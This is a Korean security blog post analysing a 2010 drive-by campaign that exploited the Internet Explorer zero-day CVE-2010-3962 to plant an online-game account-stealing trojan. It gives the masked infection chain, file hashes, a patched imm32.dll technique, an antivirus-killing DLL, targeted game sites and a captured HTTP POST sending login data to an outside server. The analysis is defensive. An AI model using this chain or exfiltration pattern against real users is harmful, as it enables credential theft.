주말을 이용하여 웹하드, 게임 관련 사이트 등 인터넷 방문자가 많은 웹 사이트에 최근 Internet Explorer 제로데이(0-Day) 취약점 CVE-2010-3962을 이용한 악성 스크립트를 통해 온라인 게임 계정 탈취를 위한 트로이목마(Trojan)를 유포하는 행위를 확인하였습니다.

제로데이 취약점은 아직 해당 보안 문제를 해결할 수 있는 보안 패치가 공개되지 않은 시점을 의미하므로 사용자의 보안 제품에서 진단하지 않는 이상 감염이 발생합니다.

이번 공격은 악의적으로 변조된 사이트에 Internet Explorer 웹 브라우저를 이용하여 접속할 경우 사용자 몰래 자동으로 감염이 이루어지므로 매우 주의가 요구되며, Internet Explorer 6 / 7 / 8 버전을 사용하시는 분들은 마이크로소프트(Microsoft)사에서 제공하는 Fix-it을 이용한 임시 대응을 통해 문제를 해결하실 수 있습니다..

[유포 경로]

h**p://s*a*e*o*.co.kr/main/main_html.html
 ㄴ h**p://yx***.com/js.js
   ㄴ h**p://cx***.com/index.htm (Microsoft : Exploit:Win32/CVE-2010-3962.A)
     ㄴ h**p://cx***.com/w.Js (AVG : Exploit)
     ㄴ h**p://gm.cx***.com/gmcx.exe :: XOR
     ㄴ h**p://s16.cnzz.com/stat.php?id=2385483&web_id=2385483

이번 사례는 해당 사이트에 악성 iframe을 추가하여 Internet Explorer 접속자는 index.htm 파일에 포함된 CVE-2010-3962 취약점을 이용한 악성 스크립트를 통해 최종적으로 gmcx.exe 파일이 실행되도록 구성되어 있습니다.

gmcx.exe 파일을 XOR 변경을 하면 최종 파일(SHA1 : e927b2978c422a2db822d6a2db334cbc07574456)에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Malware/Win32.Generic (VirusTotal : 12/43) 진단명으로 진단되며, BitDefender 엔진에서는 Gen:Trojan.Heur.fq0@Ivkpjucb 진단명으로 사전 차단되고 있습니다.

[생성 파일 등록 정보]

C:\WINDOWS\system32\imm32.dll (SHA1 : 4deef15ff0cc109369d242ac545b36447e35d997) :: 수정된 악성 imm32.dll 파일(114,176 Bytes)
 - AhnLab V3 : Trojan/Win32.Patched (VirusTotal : 16/43)

C:\WINDOWS\system32\imm32.dll.log :: 백업된 정상 imm32.dll 파일(110,080 Bytes)

C:\WINDOWS\system32\ole.dll (SHA1 : 6e2c5b38600df6298dfbd947e9a2ba59ded3581b)
 - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 15/43)

이번 악성코드 방식은 기존부터 잘 알려진 정상적인 imm32.dll 파일을 패치하여 악성 파일로 교체를 하고, 정상적인 imm32.dll 파일은 imm32.dll.log 파일로 백업해 두는 방식입니다.

ole.dll


사용자 시스템 폴더(%systemroot%\system32)에 설치된 ole.dll 파일을 살펴보면 V3 Lite, 알약(ALYac) 보안 제품 무력화(AVKiller) 기능을 포함하고 있으며, 추가적으로 다음의 온라인 게임에 대하여 게임 계정 정보를 수집하도록 제작되어 있습니다.

한게임(hangame.com)
넷마블(netmarble.net)
엔씨소프트(plaync.co.kr)
세븐소울즈 온라인(sevensoulsonline.co.kr)
피망(pmang.com)


실제 동작 과정을 간단히 살펴보면, 사용자가 온라인 게임 접속을 위해 Internet Explorer를 실행할 경우 iexplore.exe 프로세스에 imm32.dll / ole.dll 파일을 함께 실행하도록 합니다.

[한게임 로그인시 네트워크 연결 정보]

POST /hg/lin.asp?CODE=WVHKWmHm~(생략)~QoQnQmQHSoQmpHSWU HTTP/1.1
Accept: image/gif, */*
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d86c3324596
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host: 28wu.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache

사용자가 예를 든 특정 온라인 게임 사이트에서 로그인을 시도할 경우 추가적으로 중국에 위치한 특정 서버로 연결을 시도하여 입력한 계정 정보가 외부로 노출되도록 구성되어 있습니다.

이번 사례의 경우에는 현재 해당 취약점에 대한 보안 패치가 공개되지 않은 취약한 시기를 이용하고 있기 때문에 인터넷 사용자들은 신뢰할 수 있는 보안 제품을 통한 실시간 시스템 보호 및 Internet Explorer 이외의 타 웹 브라우저(Google Chrome, Firefox, Opera 등)를 임시적으로 사용하여 예방할 수 있습니다.

또한 감염된 사용자는 보안 제품을 이용한 치료를 완료한 후에는 반드시 인터넷 가입 사이트의 비밀번호 교체를 하시길 권장하며, 감염이 유발되는 인터넷 사이트에는 당분간 접속을 하지 않는 것이 안전합니다.

블로그 이미지

울지않는 벌새

울지않는벌새가 되고 싶은 나..